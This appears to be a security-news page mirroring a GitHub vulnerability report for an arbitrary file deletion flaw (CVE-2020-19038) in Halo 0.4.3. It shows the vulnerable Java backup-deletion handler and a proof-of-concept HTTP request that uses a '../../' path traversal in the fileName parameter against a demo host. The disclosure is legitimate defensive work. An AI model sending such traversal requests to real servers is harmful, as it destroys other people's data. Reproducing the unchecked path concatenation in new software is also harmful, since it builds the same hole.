Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-19038: Any file deletion in the background · Issue #136 · halo-dev/halo

File Deletion vulnerability in Halo 0.4.3 via delBackup.

CVE
#vulnerability#web#mac#apple#js#git#java#intel#chrome#webkit

我确定我已经查看了 (标注[ ]为[x])

  • Halo 使用文档
  • Github Wiki 常见问题
  • 其他 Issues

我要申请 (标注[ ]为[x])

  • BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

There is an arbitrary file deletion vulnerability in the backup file deletion.

@GetMapping(value = "delBackup")
    @ResponseBody
    public JsonResult delBackup(@RequestParam("fileName") String fileName,
                                @RequestParam("type") String type) {
        final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
        try {
            FileUtil.del(srcPath);
            return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
        } catch (Exception e) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
        }
    }

eg.

GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO

The vulnerability discoverer by Chaitin Tech.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907